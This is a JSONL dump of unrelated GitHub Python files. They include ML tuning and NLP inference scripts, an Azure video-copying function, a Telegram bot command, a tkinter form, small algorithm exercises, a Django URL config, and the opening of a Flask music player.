+{"seq_id":"17960575167","text":"# first load ds\n# then split again for validation\n# then construct catboost ensemble\n# then fit\n# output predictions on test set\n\nfrom methods import CatboostMethod\nimport numpy as np\nimport sklearn.model_selection\nimport torch\nfrom metric import amex_metric_np\nimport optuna\nfrom optuna.integration import CatBoostPruningCallback\nimport argparse\n\ndef objective(trial):\n learning_rate = trial.suggest_float(\"learning_rate\", 1e-3, 1e-1, log=True)\n depth = trial.suggest_int(\"depth\", 3, 11)\n l2_leaf_reg = trial.suggest_int(\"l2_leaf_reg\", 3, 30)\n #use_class_weights = trial.suggest_int(\"use_class_weights\", 0, 1)\n class_weights = [\n np.count_nonzero(train_y == 0) / len(train_y),\n np.count_nonzero(train_y == 1) / len(train_y),\n ]\n print(f'Determined class weights {class_weights}')\n catboost_options = {\n \"iterations\": 400,\n \"l2_leaf_reg\": l2_leaf_reg,\n \"depth\": depth,\n \"learning_rate\": learning_rate,\n \"verbose\": True,\n \"task_type\": \"GPU\" if torch.cuda.is_available() else None,\n \"eval_metric\": \"Accuracy\",\n #\"class_weights\": class_weights if use_class_weights == 1 else None,\n \"auto_class_weights\": \"Balanced\",\n \"random_seed\": 42, # Make more reproducible\n \"use_best_model\": True,\n \"od_type\": \"Iter\",\n \"od_wait\": 50,\n }\n catboost_fit_options = {\n \"callbacks\": [CatBoostPruningCallback(trial, \"Accuracy\")],\n }\n\n method = CatboostMethod(config=catboost_options)\n method.train(X_train_floats, X_val_floats, X_train_cat, X_val_cat, y_train, y_val, fit_kwargs=catboost_fit_options)\n\n preds = method.eval(X_val_floats, X_val_cat)\n metric = amex_metric_np(y_val, preds)\n return metric\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--data', required=True)\n\n args = parser.parse_args()\n\n data = np.load(args.data)\n train_floats = data['train_floats']\n train_cat = data['train_cat']\n train_y = data['train_y']\n test_floats = data['test_floats']\n test_cat = data['test_cat']\n test_y = data['test_y']\n\n X_train_floats, X_val_floats, X_train_cat, X_val_cat, y_train, y_val = sklearn.model_selection.train_test_split(\n train_floats, train_cat, train_y\n )\n\n study = optuna.create_study(direction=\"maximize\", storage='sqlite:///optuna.db', load_if_exists=True, study_name=\"amex_predict\")\n study.optimize(objective, n_trials=3)\n best_params = study.best_params\n print(best_params)","repo_name":"J-Gann/CreditDefaultPrediction","sub_path":"explore_train_catboost.py","file_name":"explore_train_catboost.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4978132046","text":"#!/usr/bin/env python\n# file utils.py\n# author Florent Guiotte \n# version 0.0\n# date 18 mars 2020\n\"\"\"\nUtils\n=====\n\nVarious utilities unrelated to trees or profiles.\n\n\"\"\"\n\nimport numpy as np\n\ndef ndarray_hash(x, l=8, c=1000):\n \"\"\"\n Compute a hash from a numpy array.\n\n Parameters\n ----------\n x : ndarray\n The array to hash.\n l : int, optional\n The length of the hash. Must be an even number.\n c : int, optional\n A variable to affect the sampling of the hash. It has to be the\n same along the matching process. Refer to notes.\n\n Returns\n -------\n hash : str\n The hash of array x.\n\n Notes\n -----\n Python hash is slow and will offset the random generator in each\n kernel. The hash of the same data will not match in different\n kernels.\n\n The idea is to sparsely sample the data to speed up the hash\n computation. By fixing the number of samples the hash computation\n will take a fixed amount of time, no matter the size of the data.\n\n This hash function output a hash of :math:`x` in hexadecimal. The\n length of the hash is :math:`l`. The hashes are consistent when\n tuning the length :math:`l`: shorter hashes are contained in the\n longer ones for the same data :math:`x`. The samples count taken in\n :math:`x` is :math:`\\\\frac{l \\\\times c}{2}`.\n\n \"\"\"\n rs = np.random.RandomState(42)\n x = np.require(x, requirements='C')\n bt = np.frombuffer(x, np.uint8)\n ss = rs.choice(bt, int(l / 2) * c).reshape(-1, c).sum(1, np.uint8)\n return ''.join(['{:02x}'.format(x) for x in ss])\n\ndef local_patch(arr, patch_size=7):\n \"\"\"\n Create local patches around each value of the array\n\n Parameters\n ----------\n arr : ndarray\n The input data.\n patch_size : int\n The size :math:`w` of the patches. For a 2D nadarray the\n returned patch size will be :math:`w \\\\times w`.\n\n Returns\n -------\n patches : ndarray\n The local patches. The shape of the returned array is\n ``arr.shape + (patch_size,) * arr.ndim``.\n\n Notes\n -----\n This implementation is memory efficient. The returned patches are a\n view of original array and are not writeable.\n\n This function works regardless of the dimension of ``arr`` with\n hypercubes shaped patches, according to the dimension of ``arr``.\n\n See Also\n --------\n local_patch_f : use a function over the local patches.\n\n \"\"\"\n a = np.pad(arr, int(patch_size / 2), 'reflect')\n shape = tuple(np.array(a.shape) - patch_size + 1) + (patch_size,) * a.ndim\n strides = a.strides * 2\n return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides, writeable=False)\n\ndef local_patch_f(arr, patch_size=7, f=np.mean):\n \"\"\"local_patch_f(arr, patch_size=7, f=np.mean)\n Describe local patches around each value of the array\n\n Parameters\n ----------\n arr : ndarray\n The input data.\n patch_size : int\n The size :math:`w` of the patches.\n f : function\n The function to run over the local patches. For now it is\n necessary to use a function with ``axis`` parameter such as\n ``np.mean``, ``np.std``, etc... See more functions on `Numpy\n documentation\n `_.\n\n Returns\n -------\n patches : ndarray\n The description of the local patches. The shape of the returned\n array is ``arr.shape``.\n\n Notes\n -----\n Refer to :func:`local_patch` for full documentation.\n\n See Also\n --------\n local_patch : create the local patches.\n\n \"\"\"\n n = local_patch(arr, patch_size)\n return f(n, axis=tuple(~(np.arange(arr.ndim))))\n","repo_name":"fguiotte/sap","sub_path":"sap/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"32158960064","text":"from collections import defaultdict as dd\r\nimport sys\r\ninput = sys.stdin.readline\r\nW, S = map(int, input().split())\r\nw = input().strip()\r\ns = input().strip()\r\nanswer = 0\r\n# w에 문자열마다 key설정 및 개수만큼 value값 증가\r\n# s에서 w만큼 슬라이싱하여 key가 모두 존재하면 경우의 수 증가\r\nw_arr = [0] * 58\r\ns_arr = [0] * 58\r\nidx = 0\r\nfor i in w:\r\n w_arr[ord(i) - 65] += 1\r\nstart = s[0]\r\nfor i in s[:W]:\r\n s_arr[ord(i)-65] += 1\r\nif w_arr == s_arr:\r\n answer += 1\r\nfor i in range(W, S):\r\n s_arr[ord(s[i])-65] += 1\r\n s_arr[ord(s[i-W])-65] -= 1\r\n if w_arr == s_arr:\r\n answer += 1\r\nprint(answer)","repo_name":"wnsgml7267/cote-practice","sub_path":"백준/Gold/1593. 문자 해독/문자 해독.py","file_name":"문자 해독.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22532816408","text":"from collections import Counter\nfrom functools import reduce\nn = int(input())\n\ncounter = Counter(list(map(int, input().split())))\n# print(counter)\nq = int(input())\nresult = 0\nfor i in range(q):\n b, c = map(int, input().split())\n counter[c] += counter[b]\n result += (c - b) * counter[b]\n counter[b] = 0\n if i == 0:\n result = sum([a * b for a, b in zip(counter.keys(), counter.values())])\n print(result)","repo_name":"melank/atCoder","sub_path":"abc171/d/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1626569494","text":"from mongoengine import *\nfrom controle_de_usuarios import Usuarios\nimport os\n\n#senha para verificar se pode adicionar\nsenha_admin = os.environ.get('SENHAADMINTELEGRAM', None)\n\n\t\nclass TextoBriga(Document):\n\tacao = StringField(required=True, max_length=300)\n\tquantUsuarios = IntField(required=True, max_length=20)\n\t\n#função responsável por gerar a briga\ndef briga(update, context):\n\tentidadesMensagem = update.message.parse_entities(types='mention')\n\t\n\t\n\t#pega as menções e transforma em nomes\n\tmembrosDaBriga = []\n\tfor nomes in entidadesMensagem.values():\n\t\tmembrosDaBriga.append(nomes)\n\n\t#verifica a quantidade de menções para poder decidir o que vai fazer\n\tquantidadeNaBriga = len(membrosDaBriga)\n\t#se a quantidade for 0, não marcou ninguem então a pessoa se bate, escolhe o que não marca ninguem e o que tem uma marcação no meio\n\tif(quantidadeNaBriga==0):\n\t\tbrigaAtual = list(TextoBriga.objects.filter(quantUsuarios__lte=1).aggregate( [ { \"$sample\": { 'size': 1 } } ]))\n\t\tif(not brigaAtual == []):\n\t\t\tbrigaAtual = brigaAtual[0]\n\t\t\ttextosBrigas = brigaAtual['acao'].split(\"\\X\")\n\t\t\tif(len(textosBrigas)==2):\n\t\t\t\tupdate.message.reply_text(textosBrigas[0]+\"@\"+update.message.from_user.username+textosBrigas[1])\n\t\t\telse:\n\t\t\t\tupdate.message.reply_text(brigaAtual['acao'])\n\t\telse:\n\t\t\tupdate.message.reply_text(\"Você bateu em si mesmo, bom trabalho\")\n\t\n\t#marcou apenas uma pessoa, então tem que escolher outra aleatóriamente\n\telif(quantidadeNaBriga==1):\n\t\tbrigaAtual = list(TextoBriga.objects.filter(quantUsuarios=2).aggregate( [ { \"$sample\": { 'size': 1 } } ]))\n\t\tusuarioAleatorio = Usuarios.objects.filter(username=update.message.from_user.username).aggregate( [ { \"$sample\": { 'size': 1 } } ])\n\t\tif(not brigaAtual == []):\n\t\t\tbrigaAtual = brigaAtual[0]\n\t\t\ttextosBrigas = brigaAtual['acao'].split(\"\\X\")\n\t\t\tfor userAt in usuarioAleatorio:\n\t\t\t\tupdate.message.reply_text(textosBrigas[0]+membrosDaBriga[0]+textosBrigas[1]+\"@\"+str(userAt['username'])+textosBrigas[2])\n\t\telse:\n\t\t\tupdate.message.reply_text(\"Aqui vai ser feito um aleatório com outras pessoas, ainda não está pronto\")\n\t\t\t\n\t#aqui tem duas pessoas marcas, então escolhe as duas e mostra a mensagem\n\telif(quantidadeNaBriga==2):\n\t\tbrigaAtual = list(TextoBriga.objects.filter(quantUsuarios=2).aggregate( [ { \"$sample\": { 'size': 1 } } ]))\n\t\tprint(brigaAtual)\n\t\tif(not brigaAtual == []):\n\t\t\tbrigaAtual = brigaAtual[0]\n\t\t\ttextosBrigas = brigaAtual['acao'].split(\"\\X\")\n\t\t\tupdate.message.reply_text(textosBrigas[0]+membrosDaBriga[0]+textosBrigas[1]+membrosDaBriga[1]+textosBrigas[2])\n\t\telse:\n\t\t\tupdate.message.reply_text(membrosDaBriga[0]+\" bateu em \"+membrosDaBriga[1])\n\t\t\t\n\t#mais que três pessoas então é briga em grupo, escolhe a mensagem apropriada e usa um for para gerar a mensagem\n\telif(quantidadeNaBriga>2):\n\t\tbrigaAtual = list(TextoBriga.objects.filter(quantUsuarios=quantidadeNaBriga).aggregate( [ { \"$sample\": { 'size': 1 } } ]))\n\t\tbrigaAtual = brigaAtual[0]\n\t\tif(not brigaAtual == []):\n\t\t\ttextosBrigas = brigaAtual['acao'].split(\"\\X\")\n\t\t\ti=0\n\t\t\ttextoFinal=\"\"\n\t\t\tfor texto in textosBrigas:\n\t\t\t\ttextoFinal+=texto+membrosDaBriga[i]\n\t\t\t\ti+=1\n\t\t\tupdate.message.reply_text(textoFinal)\n\t\telse:\n\t\t\tupdate.message.reply_text(\"Aqui vai ser porradaria em grupo, ainda não está pronto\")\n\t\t\n\t\t\n#função responsável por adicionar uma nova briga\ndef adiciona_briga(update, context):\n\ttextoAtual = update.message.text\n\ttextoAtual = textoAtual.split(\" \", 1)\n\tif(len(textoAtual)>1):\n\t\ttextoAtual = textoAtual[1].split(\"@\")\n\t\tsenha = textoAtual[0]\n\t\tif(senha_admin==senha):\n\t\t\ttextoDividido = textoAtual[1].split(\"\\X\")\n\t\t\ttamTextoDividido = len(textoDividido)\n\t\t\tif(tamTextoDividido>0):\n\t\t\t\tbrigaDB = TextoBriga(acao = textoAtual[1])\n\t\t\t\tbrigaDB.quantUsuarios = tamTextoDividido-1\n\t\t\t\tbrigaDB.save()\n\t\t\t\tupdate.message.reply_text(\"Comando salvo\")\n\t\t\telse:\n\t\t\t\tupdate.message.reply_text(\"Mensagem inválida\")\n\t\telse:\n\t\t\tupdate.message.reply_text(\"Senha incorreta\")\n\telse:\n\t\tupdate.message.reply_text(\"Mensagem inválida\")","repo_name":"felipe-b-vieira/littlelightbottelegram","sub_path":"comandos_bot/briga.py","file_name":"briga.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34809513909","text":"from tkinter import *\nfrom Database import funciones\nfrom tkinter.messagebox import showinfo, showwarning, showerror\n\ndef eliminarEstudiante():\n y2 = Frame()\n y2.place(x=0, y=0, width=500, height=1000)\n y2.config(background = \"#213141\")\n y3 = Label(y2, text=\"ELIMINAR USUARIO\",bg='black', fg='white', width=25,font=(\"bold\", 22))\n y3.place(x=40, y=60)\n\n # Creating FullName\n b = Label(y2, text=\"ID ESTUDIANTE:\", width=20, font=(\"bold\", 12))\n b.place(x=75, y=130)\n # Creating Entry For FullName\n b1 = Entry(y2)\n b1.place(x=300, y=130)\n\n def callback():\n try:\n res = funciones.deleteEstudiante(b1.get())\n if(res[\"status\"]==1):\n showinfo(\"Arquitectura empresarial\", res[\"message\"])\n y2.destroy()\n except Exception as ex:\n showinfo(\"Arquitectura empresarial\", \"Ocurrio un error al elimiar el estudiante\")\n\n Button(y2, text='SUBMIT', width=20, bg=\"#04d616\", fg='white', command=callback).place(x=180, y=180)\n\n\n Button(y2, text='RETURN', width=20, bg=\"#cd5656\", fg='white', command=lambda:[y2.destroy()]).place(x=180, y=230)\n","repo_name":"dgonzalezt2/MSSQL_with_PythonGUI","sub_path":"GUI/views/student/eliminar.py","file_name":"eliminar.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5469073192","text":"\"\"\"\npython test_cc.py \n --model_path models/T6t.mdl \n --test_file inputs/cc/commoncrawl.json\n --log_path inputs/cc/T6t\n\"\"\"\n\nimport os\nimport json\nimport time\nfrom argparse import ArgumentParser\n\nimport torch\nimport nltk\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.tokenize.treebank import TreebankWordDetokenizer as Detok\nfrom tqdm import tqdm\n\nfrom src.data import IEDatasetEval, InstanceLdcEval, BatchLdcEval\nfrom predict import load_model\n\nnltk.download('punkt')\n\ndef text_to_tokens(text, sent_id, offset):\n \"\"\"\n this tokenizes the text into words according to NLTK's model\n The important output is doc, which contains:\n (1) doc id\n (2) tokens\n \"\"\"\n doc_tokens = []\n tokens = word_tokenize(text)\n tokens = [(token, offset + i, offset + i + 1)\n for i, token in enumerate(tokens)]\n doc_tokens.append((sent_id, tokens))\n return doc_tokens, tokens\n\n\ndef numberize(data, tokenizer, sent_max_length, sent_id):\n numberized_data = []\n for i, (sent_id, sent_tokens) in enumerate(data):\n tokens = []\n token_ids = []\n pieces = []\n token_lens = []\n truncate=False\n for token_text, start_char, end_char in sent_tokens:\n token_id = '{}:{}-{}'.format(sent_id, start_char, end_char)\n token_pieces = [p for p in tokenizer.tokenize(token_text) if p]\n if len(token_pieces) == 0:\n print(\"uncommon symbol encountered\")\n print(sent_tokens)\n print()\n token_pieces = [p for p in tokenizer.tokenize('N') if p]\n # continue\n tokens.append(token_text)\n token_ids.append(token_id)\n # handle overlength sentences, by truncation\n if (len(token_pieces) + len(pieces))>(sent_max_length - 2):\n truncate=True\n if truncate:\n continue\n pieces.extend(token_pieces)\n token_lens.append(len(token_pieces))\n \n # # skip overlength sentences\n # if len(pieces) > sent_max_length - 2:\n # continue\n # skip empty sentences\n if len(pieces) == 0:\n continue\n\n # pad word pieces with special tokens\n piece_idxs = tokenizer.encode(pieces,\n add_special_tokens=True,\n max_length=sent_max_length,\n truncation=True\n )\n pad_num = sent_max_length - len(piece_idxs)\n attn_mask = [1] * len(piece_idxs) + [0] * pad_num\n piece_idxs = piece_idxs + [0] * pad_num\n\n instance = InstanceLdcEval(\n sent_id=sent_id,\n tokens=tokens,\n token_ids=token_ids,\n pieces=pieces,\n piece_idxs=piece_idxs,\n token_lens=token_lens,\n attention_mask=attn_mask\n )\n numberized_data.append(instance)\n return numberized_data\n\ndef collate_fn(batch, use_gpu=False):\n batch_piece_idxs = []\n batch_tokens = []\n batch_token_lens = []\n batch_attention_masks = []\n batch_sent_ids = []\n batch_token_ids = []\n batch_token_nums = []\n\n for inst in batch:\n batch_piece_idxs.append(inst.piece_idxs)\n batch_attention_masks.append(inst.attention_mask)\n batch_token_lens.append(inst.token_lens)\n batch_tokens.append(inst.tokens)\n batch_sent_ids.append(inst.sent_id)\n batch_token_ids.append(inst.token_ids)\n batch_token_nums.append(len(inst.tokens))\n\n if use_gpu:\n batch_piece_idxs = torch.cuda.LongTensor(batch_piece_idxs)\n batch_attention_masks = torch.cuda.FloatTensor(\n batch_attention_masks)\n batch_token_nums = torch.cuda.LongTensor(batch_token_nums)\n else:\n batch_piece_idxs = torch.LongTensor(batch_piece_idxs)\n batch_attention_masks = torch.FloatTensor(\n batch_attention_masks)\n batch_token_nums = torch.LongTensor(batch_token_nums)\n\n return BatchLdcEval(sent_ids=batch_sent_ids,\n token_ids=batch_token_ids,\n tokens=batch_tokens,\n piece_idxs=batch_piece_idxs,\n token_lens=batch_token_lens,\n attention_masks=batch_attention_masks,\n token_nums=batch_token_nums)\n\n\ndef prepare_text(text, offset, tokenizer, sent_max_length, use_gpu, sent_id='asd'):\n data, tokens = text_to_tokens(text, sent_id, offset)\n data = numberize(data, tokenizer, sent_max_length, offset)\n data = collate_fn(data, use_gpu)\n return data, tokens\n\n\ndef get_graph_task_attribute(graph, task):\n if task == 'entities':\n return graph.entities, graph.entity_scores\n if task == 'triggers':\n return graph.triggers, graph.trigger_scores\n if task == 'relations':\n return graph.relations, graph.relation_scores\n if task == 'roles':\n return graph.roles, graph.role_scores\n return None, None\n\n\ndef get_task_type(task):\n if task == 'entities':\n return 'entity_type'\n if task == 'triggers':\n return 'event_type'\n if task == 'relations':\n return 'relation_type'\n if task == 'roles':\n return 'role_type'\n return None\n\n\ndef get_predictions_scores(graph):\n task_list = ['entities', 'triggers', 'relations', 'roles']\n output = {}\n\n for task in task_list:\n pred_list = []\n pred_task, pred_task_scores = get_graph_task_attribute(graph, task)\n for idx, entity in enumerate(pred_task):\n start, end, entity_type = entity\n itos = {i: s for s, i in graph.vocabs[get_task_type(task)].items()}\n label = itos[entity_type]\n pred_list.append([start, end, label, pred_task_scores[idx]])\n\n output[task] = pred_list\n\n return output\n\n\ndef predict(article, model, tokenizer, config, sent_max_length, use_gpu=False):\n detokenizer = Detok()\n sentences = article.get('sentences')\n\n sentence_list = []\n offset = 0\n for idx, text_list in enumerate(sentences):\n doc_id = f'{article.get(\"filename\")}'\n sent_id = f'{article.get(\"filename\")}-{idx}'\n text = detokenizer.detokenize(text_list)\n # text = ' '.join(text_list)\n data, tokens = prepare_text(text, offset, tokenizer, sent_max_length, use_gpu, sent_id)\n offset += len(tokens)\n graph = model.predict(data)\n graph = graph[0]\n graph.clean(relation_directional=config.relation_directional,\n symmetric_relations=config.symmetric_relations)\n scores = get_predictions_scores(graph)\n # sentence_pred = {\n # 'sent_id': sent_id,\n # 'pred': scores,\n # 'tokens': text_list\n # }\n sentence_pred = {\n 'doc_id':doc_id, \n 'sent_id': sent_id,\n 'token_ids': data.token_ids[0], # this works because script takes in single sentences only\n 'tokens': [token[0] for token in tokens], # text_list,\n 'graph': graph.to_dict()\n }\n sentence_list.append(sentence_pred)\n\n return sentence_list\n\ndef count_maxlen_of_articles(articles):\n \"\"\"\n This will estimate highest nunmber of tokens in the sentences in articles\n Allowing us to set an appropriate token length for our transformer\n which is O(n^3) in complexity to sentence len n\n \"\"\"\n def count_sentence_len(doc):\n sentences = doc['sentences']\n return max([len(sentence) for sentence in sentence])\n\n return max([count_sentence_len(doc) for doc in articles])\n\nif __name__ == \"__main__\":\n\n # configuration\n parser = ArgumentParser()\n parser.add_argument('--model_path', default=None, type=str)\n parser.add_argument(\"--test_file\", default=None, type=str)\n parser.add_argument(\"--log_path\", default=None, type=str)\n parser.add_argument(\"--sent_max_length\", default=512, type=int)\n parser.add_argument(\"--use_gpu\", default=False, action='store_true')\n args = parser.parse_args()\n\n # output\n timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n output_dir = os.path.join(args.log_path, timestamp)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n predictions_file = os.path.join(output_dir, f'predictions.json')\n\n log_file = os.path.join(output_dir, 'log.txt')\n with open(log_file, 'w', encoding='utf-8') as w:\n print('Log file: {}'.format(log_file))\n\n print(f'Will use GPU: {args.use_gpu}')\n\n # load the model from file\n model, tokenizer, config = load_model(args.model_path,\n device=0,\n gpu=args.use_gpu,\n beam_size=5)\n\n # set GPU device\n if args.use_gpu:\n torch.cuda.set_device(0)\n\n # load cc json\n with open(args.test_file, 'r') as f, open(predictions_file, 'a') as output_f:\n articles = [json.loads(a) for a in f.readlines()]\n print(f'Loaded {len(articles)} articles from {args.test_file}.')\n print(f'Found token max length of {count_maxlen_of_articles(articles)} in {args.test_file}')\n\n # iterate through each article\n progress = tqdm(total=len(articles), ncols=75)\n for idx, article in enumerate(articles):\n progress.update(1)\n predicted_article_events = predict(article, model, tokenizer, config, args.sent_max_length)\n\n for sent in predicted_article_events:\n # save the articles with predictions back into a json\n json.dump(sent, output_f)\n output_f.write('\\n')\n\n print('Done.')\n","repo_name":"jeremytanjianle/event-extraction-oneie","sub_path":"test_cc.py","file_name":"test_cc.py","file_ext":"py","file_size_in_byte":9759,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"26914880302","text":"# This function is not intended to be invoked directly. Instead it will be\n# triggered by an orchestrator function.\n# Before running this sample, please:\n# - create a Durable orchestration function\n# - create a Durable HTTP starter function\n# - add azure-functions-durable to requirements.txt\n# - run pip install -r requirements.txt\n\nimport logging\nfrom azure.storage.blob import BlockBlobService, PublicAccess\nimport os\nfrom datetime import datetime\nfrom MyFunctions import (\n get_file_name_from_URL,\n run_sql_command,\n get_url_container_and_file_name,\n get_SAS_URL,\n update_EventBuilderProgress\n)\n\n\ndef main(inputDict: dict) -> str:\n logging.info(\"VideosIntoEvent started\")\n ## Get image list\n videoList = inputDict['videoList']\n sport = inputDict['sport']\n event = inputDict['event']\n samplingProportion = inputDict['samplingProportion']\n audioTranscript = inputDict['audioTranscript']\n logging.info(f\"videoList len: {len(videoList)}\")\n logging.info(f\"sport: {sport}\")\n logging.info(f\"event: {event}\")\n ## # Create query to add rows to AzureBlobVideos SQL table\n ## Columns\n columnList = [\n # 'VideoID', - auto incrementing\n 'VideoName',\n 'Event',\n 'Sport',\n 'EndpointID',\n 'MultipleVideoEvent',\n 'SamplingProportion',\n 'AudioTranscript'\n ]\n columnListString = \",\".join([\n f\"[{c}]\"\n for c in columnList\n ])\n ## Split `videoList` into blocks of 900 (1000 is the limit)\n n = 900\n videoListBlocks = [\n videoList[i * n:(i + 1) * n]\n for i in range((len(videoList) + n - 1) // n )\n ]\n\n for I,vlb in enumerate(videoListBlocks):\n logging.info(f\"query {I+1} of {len(videoListBlocks)}\")\n ## Values\n valuesList = [\n \",\".join([\n f\"'{get_file_name_from_URL(vidURL)}'\",\n f\"'{event}'\",\n f\"'{sport}'\",\n \"NULL\",\n \"1\", # equivalent of True\n str(samplingProportion),\n \"1\" if audioTranscript else \"0\"\n ])\n for vidURL in vlb\n ]\n valuesListString = \"),(\".join(valuesList)\n ## Build query\n insertQuery = f\"\"\"\n INSERT INTO AzureBlobVideos ({columnListString})\n VALUES ({valuesListString})\n \"\"\"\n logging.info(f\"AzureBlobVideos query: {insertQuery}\")\n ## Run query\n run_sql_command(\n sqlQuery=insertQuery,\n database=\"AzureCognitive\"\n )\n logging.info(\"query run\")\n\n \n ## # Upload videos to us-office\n ## Create block blob services\n sourceBBS = BlockBlobService(\n connection_string=os.getenv(\"socialscrapingCS\"))\n logging.info(\"source BBS created\")\n destinationBBS = BlockBlobService(\n connection_string=os.getenv(\"fsevideosCS\"))\n logging.info(\"dest BBS created\")\n\n ## Loop through list of videos\n logging.info(\"start loading videos into `us-office` container\")\n for vidURL in videoList:\n urlContainer,urlFileName = get_url_container_and_file_name(vidURL)\n ## Create SAS URL\n sasURL = get_SAS_URL(\n fileURL=vidURL,\n block_blob_service=sourceBBS,\n container=urlContainer\n )\n ## Copy blob\n destinationBBS.copy_blob(\n container_name=\"us-office\",\n blob_name=urlFileName,\n copy_source=sasURL\n )\n\n ## Update row in SQL\n update_EventBuilderProgress(\n uuid=inputDict['uuid'],\n utcNowStr=datetime.strftime(\n datetime.utcnow(),\n \"%Y-%m-%dT%H:%M:%S\"\n ),\n stage=\"Videos inserted into AzureBlobVideos\",\n ebs_stages=inputDict['ebs_stages'],\n stage_count=inputDict['stage_count']\n )\n\n return \"done\"","repo_name":"OD1995/FSEMultimediaEventBuilder","sub_path":"VideosIntoEvent/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16239741732","text":"# Definition for a binary tree node\nclass TreeNode:\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution:\n\n\t# @param A : root node of tree\n\t# @return the root node in the tree\n\tdef invertTree(self, A):\n\n if A == None:\n return None\n else:\n c = self.invertTree(A.left)\n d = self.invertTree(A.right)\n A.left = d\n A.right = c\n return A\n\nobj = Solution()\nt1 = TreeNode(1)\nt2 = TreeNode(2)\nt3 = TreeNode(3)\nt1.left = t2\nt1.right = t3\nprint(t1.left.val)\nprint(t1.right.val)\nobj.invertTree(t1)\nprint(t1.left.val)\nprint(t1.right.val)","repo_name":"aman-bcalm/Scaler-Problems","sub_path":"Day 24/InvertBinaryTree.py","file_name":"InvertBinaryTree.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71326023593","text":"amount_of_people = int(input())\namount_of_nights = int(input())\namount_of_cards_for_transport = int(input())\namount_of_tickets = int(input())\n\ndiscount = 0.25\n\nnights_price = amount_of_nights * 20\ncard_for_transport_price = amount_of_cards_for_transport * 1.60\nticket_price = amount_of_tickets * 6\n\nprice_for_one_person = nights_price + card_for_transport_price + ticket_price\n\ntotal_price_for_all = price_for_one_person * amount_of_people\n\ntotal_price = total_price_for_all + (total_price_for_all * discount)\n\nprint(f\"{total_price:.2f}\")","repo_name":"Darkartt/SoftUni","sub_path":"SoftUni-Basic/pre_exam/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16682319263","text":"class ITA_Subject:\n\n area = None\n enjoy = None\n\n def __init__(self, subject_name, professor):\n \n if subject_name[0] != self.area[0]:\n raise Exception(\"Invalid subject name for this area\")\n \n self.professor = professor\n self.name = subject_name\n \n def study(self):\n print(\"I {0} studying {1}\".format(self.enjoy, self.name))\n\n def avaliacao_do_curso(self, avaliacoes):\n avaliacao_total = avaliacoes[0]\n for i in range(1, len(avaliacoes)):\n avaliacao_total += avaliacoes[i]\n print('Avaliação final do curso: {}'.format(\n avaliacao_total))\n \n\nclass Computation_Subject(ITA_Subject):\n \n area = 'Computation'\n enjoy = 'like'\n\nclass Electronics_Subject(ITA_Subject):\n\n area = 'Electronics'\n enjoy = 'don\\'t like'\n\nclass Mathematics_Subject(ITA_Subject):\n\n area = 'Mathematics'\n enjoy = 'love'\n\nclass Humanities_Subject(ITA_Subject):\n\n area = 'Humanities'\n enjoy = 'hate'\n\n\ndef main():\n MAT_12 = Mathematics_Subject('MAT-12', 'Luiz Augusto')\n CES_22 = Computation_Subject('CES-22', 'Karla')\n ELE_52 = Electronics_Subject('ELE-52', 'Douglas')\n #If you uncomment the line below the compilation \n # will raise an exception.\n #CES_12 = Humanities_Subject('CES-12', 'Nilda')\n CES_22.study()\n ELE_52.study()\n # Veja que independente do tipo de avaliação (texto\n # ou nota de 0 a 10). O python conseguiu compilar o \n # código, pois utiliza do duck_typing. Foi utilizado \n # o símbolo '+' tanto para soma de strings quanto para \n # soma de notas.\n CES_22.avaliacao_do_curso(['Muito bom.', 'Bom.', \n 'Sensacional.'])\n CES_22.avaliacao_do_curso([10.0, 9.5, 10.0])\n\nmain()","repo_name":"caio-ggomes/Lista2-CES22","sub_path":"questao12.py","file_name":"questao12.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69896042154","text":"# users/url.py\n\n\"\"\"Defines URL patterns for users.\"\"\"\n\n# Django modules\nfrom django.urls import path, include\n\n# Locals\nfrom . import views\n\napp_name = 'users'\nurlpatterns = [\n\t# Include default auth urls.\n\tpath('', include('django.contrib.auth.urls')),\n\t# Registration page.\n\tpath('register/', views.register, name='register'),\n]","repo_name":"gurnitha/2022-django-learninglogs","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26681318266","text":"import os\nfrom flask import Flask\nfrom flask import render_template, request\nfrom player import MusicPlayer\nfrom werkzeug.utils import secure_filename\nfrom flask import send_file\n#from gpio_handler import GpioHandler\nfrom subprocess import call\nimport signal\nfrom sys import exit\n# creates a Flask application, named app\napp = Flask(__name__)\nplayer = MusicPlayer()\n\ndef signal_handler(sig, frame):\n 